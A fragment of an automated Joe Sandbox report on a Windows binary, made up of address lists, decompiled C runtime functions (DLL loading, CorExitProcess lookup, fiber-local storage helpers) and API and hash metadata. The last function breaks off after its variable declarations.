                                              0x00b1edea
                                              0x00b1edea
                                              0x00b1edf1
                                              0x00b1edf3
                                              0x00000000
                                              0x00b1edf9
                                              0x00b1edf9
                                              0x00b1edfd
                                              0x00b1ee01
                                              0x00b1ee01
                                              0x00b1ee03
                                              0x00b1ee05
                                              0x00b1ee07
                                              0x00b1ee09
                                              0x00b1ee09
                                              0x00b1ee09
                                              0x00b1ee0c
                                              0x00b1ee0c
                                              0x00b1ee13
                                              0x00b1ee15
                                              0x00000000
                                              0x00b1ee1b
                                              0x00b1ee1b
                                              0x00b1ee1f
                                              0x00b1ee23
                                              0x00b1ee23
                                              0x00b1ee25
                                              0x00b1ee27
                                              0x00b1ee29
                                              0x00b1ee2b
                                              0x00b1ee2b
                                              0x00b1ee2b
                                              0x00b1ee2e
                                              0x00b1ee2e
                                              0x00b1ee35
                                              0x00b1ee37
                                              0x00000000
                                              0x00b1ee3d
                                              0x00b1ee3d
                                              0x00b1ee41
                                              0x00b1ee45
                                              0x00b1ee45
                                              0x00b1ee47
                                              0x00b1ee49
                                              0x00b1ee4b
                                              0x00b1ee4d
                                              0x00b1ee4d
                                              0x00b1ee4d
                                              0x00b1ee50
                                              0x00b1ee50
                                              0x00b1ee57
                                              0x00b1ee59
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b1ee59
                                              0x00b1ee37
                                              0x00b1ee15
                                              0x00b1edf3
                                              0x00000000
                                              0x00000000
                                              0x00b1f1e5
                                              0x00b1f1e5
                                              0x00b1f1e8
                                              0x00b1f1eb
                                              0x00000000
                                              0x00b1f1f1
                                              0x00b1f1f1
                                              0x00b1f1f4
                                              0x00b1f1f8
                                              0x00b1f1f8
                                              0x00b1f1fa
                                              0x00b1f1fc
                                              0x00b1f1fe
                                              0x00b1f200
                                              0x00b1f200
                                              0x00b1f200
                                              0x00b1f203
                                              0x00b1f203
                                              0x00b1f20a
                                              0x00b1f20c
                                              0x00000000
                                              0x00b1f212
                                              0x00b1f212
                                              0x00b1f216
                                              0x00b1f21a
                                              0x00b1f21a
                                              0x00b1f21c
                                              0x00b1f21e
                                              0x00b1f220
                                              0x00b1f222
                                              0x00b1f222
                                              0x00b1f222
                                              0x00b1f225
                                              0x00b1f225
                                              0x00b1f22c
                                              0x00b1f22e
                                              0x00000000
                                              0x00b1f234
                                              0x00b1f234
                                              0x00b1f238
                                              0x00b1f23c
                                              0x00b1f23c
                                              0x00b1f23e
                                              0x00b1f240
                                              0x00b1f242
                                              0x00b1f244
                                              0x00b1f244
                                              0x00b1f244
                                              0x00b1f247
                                              0x00b1f247
                                              0x00b1f24e
                                              0x00b1f250
                                              0x00000000
                                              0x00b1f256
                                              0x00b1f256
                                              0x00b1f25a
                                              0x00b1f25e
                                              0x00b1f25e
                                              0x00b1f260
                                              0x00b1f262
                                              0x00b1f264
                                              0x00b1f266
                                              0x00b1f266
                                              0x00b1f266
                                              0x00b1f269
                                              0x00b1f269
                                              0x00b1f270
                                              0x00b1f272
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b1f272
                                              0x00b1f250
                                              0x00b1f22e
                                              0x00b1f20c
                                              0x00000000
                                              0x00000000
                                              0x00b1e524
                                              0x00b1e527
                                              0x00b1e52a
                                              0x00000000
                                              0x00b1e530
                                              0x00b1e537
                                              0x00b1e537
                                              0x00b1e539
                                              0x00b1e53d
                                              0x00b1e53f
                                              0x00b1e53f
                                              0x00b1e542
                                              0x00b1e542
                                              0x00b1e549
                                              0x00b1e54b
                                              0x00b1e559
                                              0x00b1e559
                                              0x00b1e55b
                                              0x00b1e55f
                                              0x00b1e561
                                              0x00b1e561
                                              0x00b1e564
                                              0x00b1e564
                                              0x00b1e56b
                                              0x00b1e56d
                                              0x00b1e57b
                                              0x00b1e57b
                                              0x00b1e57d
                                              0x00b1e581
                                              0x00b1e583
                                              0x00b1e583
                                              0x00b1e586
                                              0x00b1e586
                                              0x00b1e58d
                                              0x00b1e58f
                                              0x00b1e59d
                                              0x00b1e59d
                                              0x00b1e59f
                                              0x00b1e5a3
                                              0x00b1e5a5
                                              0x00b1e5a5
                                              0x00b1e5a8
                                              0x00b1e5a8
                                              0x00b1e5af
                                              0x00b1e5b1
                                              0x00000000
                                              0x00000000
                                              0x00b1e5b1
                                              0x00b1e58f
                                              0x00b1e56d
                                              0x00b1e54b
                                              0x00000000
                                              0x00000000
                                              0x00b1e91f
                                              0x00b1e922
                                              0x00b1e925
                                              0x00000000
                                              0x00b1e927
                                              0x00b1e927
                                              0x00b1e92a
                                              0x00b1e92e
                                              0x00b1e92e
                                              0x00b1e930
                                              0x00b1e932
                                              0x00b1e934
                                              0x00b1e936
                                              0x00b1e936
                                              0x00b1e936
                                              0x00b1e939
                                              0x00b1e939
                                              0x00b1e940
                                              0x00b1e942
                                              0x00000000
                                              0x00b1e944
                                              0x00b1e944
                                              0x00b1e948
                                              0x00b1e94c
                                              0x00b1e94c
                                              0x00b1e94e
                                              0x00b1e950
                                              0x00b1e952
                                              0x00b1e954
                                              0x00b1e954
                                              0x00b1e954
                                              0x00b1e957
                                              0x00b1e957
                                              0x00b1e95e
                                              0x00b1e960
                                              0x00000000
                                              0x00b1e962
                                              0x00b1e962
                                              0x00b1e966
                                              0x00b1e96a
                                              0x00b1e96a
                                              0x00b1e96c
                                              0x00b1e96e
                                              0x00b1e970
                                              0x00b1e972
                                              0x00b1e972
                                              0x00b1e972
                                              0x00b1e975
                                              0x00b1e975
                                              0x00b1e97c
                                              0x00b1e97e
                                              0x00000000
                                              0x00b1e980
                                              0x00b1e980
                                              0x00b1e984
                                              0x00b1e988
                                              0x00b1e988
                                              0x00b1e98a
                                              0x00b1e98c
                                              0x00b1e98e
                                              0x00b1e990
                                              0x00b1e990
                                              0x00b1e990
                                              0x00b1e993
                                              0x00b1e993
                                              0x00b1e99a
                                              0x00b1e99c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b1e99c
                                              0x00b1e97e
                                              0x00b1e960
                                              0x00b1e942
                                              0x00000000
                                              0x00000000
                                              0x00b1ed39
                                              0x00b1ed3c
                                              0x00b1ed3f
                                              0x00000000
                                              0x00b1ed45
                                              0x00b1ed45
                                              0x00b1ed48
                                              0x00b1ed4c
                                              0x00b1ed4c
                                              0x00b1ed4e
                                              0x00b1ed50
                                              0x00b1ed52
                                              0x00b1ed54
                                              0x00b1ed54
                                              0x00b1ed54
                                              0x00b1ed57
                                              0x00b1ed57
                                              0x00b1ed5e
                                              0x00b1ed60
                                              0x00000000
                                              0x00b1ed66
                                              0x00b1ed66
                                              0x00b1ed6a
                                              0x00b1ed6e
                                              0x00b1ed6e
                                              0x00b1ed70
                                              0x00b1ed72
                                              0x00b1ed74
                                              0x00b1ed76
                                              0x00b1ed76
                                              0x00b1ed76
                                              0x00b1ed79
                                              0x00b1ed79
                                              0x00b1ed80
                                              0x00b1ed82
                                              0x00000000
                                              0x00b1ed88
                                              0x00b1ed88
                                              0x00b1ed8c
                                              0x00b1ed90
                                              0x00b1ed90
                                              0x00b1ed92
                                              0x00b1ed94
                                              0x00b1ed96
                                              0x00b1ed98
                                              0x00b1ed98
                                              0x00b1ed98
                                              0x00b1ed9b
                                              0x00b1ed9b
                                              0x00b1eda2
                                              0x00b1eda4
                                              0x00000000
                                              0x00b1edaa
                                              0x00b1edaa
                                              0x00b1edae
                                              0x00b1edb2
                                              0x00b1edb2
                                              0x00b1edb4
                                              0x00b1edb6
                                              0x00b1edb8
                                              0x00b1edba
                                              0x00b1edba
                                              0x00b1edba
                                              0x00b1edbd
                                              0x00b1edbd
                                              0x00b1edc4
                                              0x00b1edc6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b1edc6
                                              0x00b1eda4
                                              0x00b1ed82
                                              0x00b1ed60
                                              0x00000000
                                              0x00000000
                                              0x00b1f152
                                              0x00b1f155
                                              0x00b1f158
                                              0x00000000
                                              0x00b1f15e
                                              0x00b1f15e
                                              0x00b1f161
                                              0x00b1f165
                                              0x00b1f165
                                              0x00b1f167
                                              0x00b1f169
                                              0x00b1f16b
                                              0x00b1f16d
                                              0x00b1f16d
                                              0x00b1f16d
                                              0x00b1f170
                                              0x00b1f170
                                              0x00b1f177
                                              0x00b1f179
                                              0x00000000
                                              0x00b1f17f
                                              0x00b1f17f
                                              0x00b1f183
                                              0x00b1f187
                                              0x00b1f187
                                              0x00b1f189
                                              0x00b1f18b
                                              0x00b1f18d
                                              0x00b1f18f
                                              0x00b1f18f
                                              0x00b1f18f
                                              0x00b1f192
                                              0x00b1f192
                                              0x00b1f199
                                              0x00b1f19b
                                              0x00000000
                                              0x00b1f1a1
                                              0x00b1f1a1
                                              0x00b1f1a5
                                              0x00b1f1a9
                                              0x00b1f1a9
                                              0x00b1f1ab
                                              0x00b1f1ad
                                              0x00b1f1af
                                              0x00b1f1b1
                                              0x00b1f1b1
                                              0x00b1f1b1
                                              0x00b1f1b4
                                              0x00b1f1b4
                                              0x00b1f1bb
                                              0x00b1f1bd
                                              0x00000000
                                              0x00b1f1c3
                                              0x00b1f1c3
                                              0x00b1f1c7
                                              0x00b1f1cb
                                              0x00b1f1cb
                                              0x00b1f1cd
                                              0x00b1f1cf
                                              0x00b1f1d1
                                              0x00b1f1d3
                                              0x00b1f1d3
                                              0x00b1f1d3
                                              0x00b1f1d6
                                              0x00b1f1d6
                                              0x00b1f1dd
                                              0x00b1f1df
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b1f1df
                                              0x00b1f1bd
                                              0x00b1f19b
                                              0x00b1f179
                                              0x00000000
                                              0x00000000
                                              0x00b1e51d
                                              0x00b1e05f
                                              0x00b1e056
                                              0x00b1e04d
                                              0x00b1e044
                                              0x00b1f625
                                              0x00b1f628
                                              0x00b1df62
                                              0x00000000
                                              0x00b1df62
                                              0x00b1df60
                                              0x00b1df5e
                                              0x00000000
                                              0x00b1df67
                                              0x00b1df67
                                              0x00b1df69
                                              0x00b1df70
                                              0x00000000
                                              0x00b1df72
                                              0x00000000
                                              0x00b1df70
                                              0x00b1df35
                                              0x00000000

                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00B1DF07
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00B1DF0F
                                              • _ValidateLocalCookies.LIBCMT ref: 00B1DF98
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00B1DFC3
                                              • _ValidateLocalCookies.LIBCMT ref: 00B1E018
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: b62c552193824d84f0e89cf1805764eff89e21041f1cf536f46dd109a23c833e
                                              • Instruction ID: e623511831eae262cb4cda7576f79b2e20a434138fe1d7c2bc23fb160c2ad572
                                              • Opcode Fuzzy Hash: b62c552193824d84f0e89cf1805764eff89e21041f1cf536f46dd109a23c833e
                                              • Instruction Fuzzy Hash: 9941A430A00218ABCF14DF68D884ADEBBF5FF44324F5481D5F8199B396D731AA96CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B19950 Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CaretFocus$HideInvertRectReleaseShow
                                              • String ID:
                                              • API String ID: 4235554027-0
                                              • Opcode ID: 2c1a91ca20fc8188f6e2462604a9343a382a94bdd3068e21516e96606b2ab14d
                                              • Instruction ID: 9ac86f2107b090c0f026519e27fa326b8e56ffa5eb79a9575fe6a6acfd95b077
                                              • Opcode Fuzzy Hash: 2c1a91ca20fc8188f6e2462604a9343a382a94bdd3068e21516e96606b2ab14d
                                              • Instruction Fuzzy Hash: AA31B674A00248DFCB04DFA8D599AACBBF0FF08351F518469E889DB310DB34EA88CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B22369 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00B22369(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0xb360b0 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0xb2cae0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0xb360b0 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0xb360b0 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00B24A59(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00B24A59(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                              0x00b22372
                                              0x00b22407
                                              0x00b2237a
                                              0x00b2237c
                                              0x00b22386
                                              0x00b2238b
                                              0x00b22398
                                              0x00b223ad
                                              0x00b223b1
                                              0x00b22417
                                              0x00b2241c
                                              0x00b22423
                                              0x00b22427
                                              0x00b2242a
                                              0x00b2242a
                                              0x00b22430
                                              0x00b22430
                                              0x00b22412
                                              0x00b22416
                                              0x00b22416
                                              0x00b223b3
                                              0x00b223bc
                                              0x00b223f5
                                              0x00b22402
                                              0x00b22404
                                              0x00b22404
                                              0x00000000
                                              0x00b22404
                                              0x00b223c6
                                              0x00b223cb
                                              0x00b223d0
                                              0x00000000
                                              0x00000000
                                              0x00b223da
                                              0x00b223df
                                              0x00b223e4
                                              0x00000000
                                              0x00000000
                                              0x00b223e9
                                              0x00b223ef
                                              0x00b223f3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b223f3
                                              0x00b22390
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b22396
                                              0x00b22410
                                              0x00000000

                                              APIs
                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,245FDE3E,?,00B22476,?,00B20F65,00000000,00000000), ref: 00B2242A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: api-ms-$ext-ms-
                                              • API String ID: 3664257935-537541572
                                              • Opcode ID: f978f5cbcb92852db7598db3b7d92a9f0b921f472228522d1491cedf6b1a9d2b
                                              • Instruction ID: 20bca3a75f9962b89177713fba457fb323e98317d7a75726abf922dda2aabd14
                                              • Opcode Fuzzy Hash: f978f5cbcb92852db7598db3b7d92a9f0b921f472228522d1491cedf6b1a9d2b
                                              • Instruction Fuzzy Hash: FE21D832A00131BBCB21A764BC45A5E37A8EB42760F3541A1ED1AE7390EF74ED01C6D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B21C7C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E00B21C7C(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xb34064 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00B25FC6(_t13,  *0xb34064);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00B26001(_t14,  *0xb34064, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00B20F42();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00B26001(_t18,  *0xb34064, 0);
								} else {
									_t8 = E00B26001(_t18,  *0xb34064, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00B20F4D(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                              0x00b21c7c
                                              0x00b21c83
                                              0x00b21c96
                                              0x00b21c9d
                                              0x00b21c9f
                                              0x00b21ca3
                                              0x00b21cbc
                                              0x00b21cbc
                                              0x00b21ca5
                                              0x00b21ca7
                                              0x00b21cba
                                              0x00b21cc1
                                              0x00b21cca
                                              0x00b21ccd
                                              0x00b21cd0
                                              0x00b21ce4
                                              0x00b21ce4
                                              0x00b21ced
                                              0x00b21cd2
                                              0x00b21cd9
                                              0x00b21cdf
                                              0x00b21ce2
                                              0x00b21cf6
                                              0x00b21cf8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b21ce2
                                              0x00b21cfb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b21cba
                                              0x00b21ca7
                                              0x00b21d03
                                              0x00b21d0d
                                              0x00b21c85
                                              0x00b21c87
                                              0x00b21c87

                                              APIs
                                              • GetLastError.KERNEL32(?,?,00B21C73,00B1DD33,00B1D88B), ref: 00B21C8A
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B21C98
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B21CB1
                                              • SetLastError.KERNEL32(00000000,00B21C73,00B1DD33,00B1D88B), ref: 00B21D03
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: e49d0e7973e5607cd1194d9360cff1521c19e60c32be052a62b16fd7662e7219
                                              • Instruction ID: e0e8a58acea770c7fdbef8a28e7343c197f1af0ff589fc35bad83ac9b213bd27
                                              • Opcode Fuzzy Hash: e49d0e7973e5607cd1194d9360cff1521c19e60c32be052a62b16fd7662e7219
                                              • Instruction Fuzzy Hash: 6E0184362493316EE62827BC7DC6A6B27D8DB6177573006BAF6198A0E1EF115C416244
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1B420 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                                              • String ID: d
                                              • API String ID: 3626877506-2564639436
                                              • Opcode ID: 6672da8c189a090c74ca2a8eeacfc38e68ae567af5aa9056ac078de7af9e0132
                                              • Instruction ID: e577c7c42e4a704d256124a40bc25d0c300ed9812047f15fda90afdbd29bd023
                                              • Opcode Fuzzy Hash: 6672da8c189a090c74ca2a8eeacfc38e68ae567af5aa9056ac078de7af9e0132
                                              • Instruction Fuzzy Hash: A571C074A002199FCB04CF58C098EADBBF1FF58315F1584A9E889EB362D735E981CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B13370 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: System
                                              • String ID: `
                                              • API String ID: 3470857405-2679148245
                                              • Opcode ID: 442bc46606c4a8f38fa5dd5347cf70bcb63a8faeb28042979c5bc695e3cdaf26
                                              • Instruction ID: b5136b2aa468f68832f29c024c94ac28a8f3000f7144733e7aefb40ba4b259d6
                                              • Opcode Fuzzy Hash: 442bc46606c4a8f38fa5dd5347cf70bcb63a8faeb28042979c5bc695e3cdaf26
                                              • Instruction Fuzzy Hash: 4B412EB8104209AFD740EF58D598B9ABBE4FB48314F11C45AEC688B362D7BAD948DF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B2001C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 25%
                                              			E00B2001C(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0xb34050; // 0x245fde3e
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0xb2af36, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0xb37000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                              0x00b20031
                                              0x00b2003c
                                              0x00b20042
                                              0x00b20046
                                              0x00b20051
                                              0x00b20059
                                              0x00b20063
                                              0x00b20069
                                              0x00b2006d
                                              0x00b20074
                                              0x00b2007a
                                              0x00b2007a
                                              0x00b2006d
                                              0x00b20080
                                              0x00b20085
                                              0x00b20085
                                              0x00b2008e
                                              0x00b20098

                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,245FDE3E,?,?,00000000,00B2AF36,000000FF,?,00B200E6,00B1FF81,?,00B20182,00000000), ref: 00B20051
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B20063
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00B2AF36,000000FF,?,00B200E6,00B1FF81,?,00B20182,00000000), ref: 00B20085
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: ab66313bc57a6a9d5e748b7cffa3a4f72acfa2e7e6504bd9bd9eec66f18c0bb8
                                              • Instruction ID: 359d674de898b580c6d44c77fc354e8855b40164182eff533ca52c60af51ee95
                                              • Opcode Fuzzy Hash: ab66313bc57a6a9d5e748b7cffa3a4f72acfa2e7e6504bd9bd9eec66f18c0bb8
                                              • Instruction Fuzzy Hash: D8018F71954629ABDB219B54DC09FAFBBF8FB04B11F100679E811A22A0DB789900CA90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1A450 Relevance: 7.5, APIs: 5, Instructions: 47windowclipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: EnableItemMenu$AvailableClipboardFormat
                                              • String ID:
                                              • API String ID: 4217543366-0
                                              • Opcode ID: c61c3357539816e2a406996ca59341153eb6c1d00330968bb0ece31a6cabab77
                                              • Instruction ID: 4a844c2d417d2b25ff133560e3f31fd65101c68232be0a23b611669948dfd870
                                              • Opcode Fuzzy Hash: c61c3357539816e2a406996ca59341153eb6c1d00330968bb0ece31a6cabab77
                                              • Instruction Fuzzy Hash: 6911F874604214AFD704EF68D58979EBBE4EB84701F10C82DEC898B354DB75D8488B42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B27EA7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E00B27EA7(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
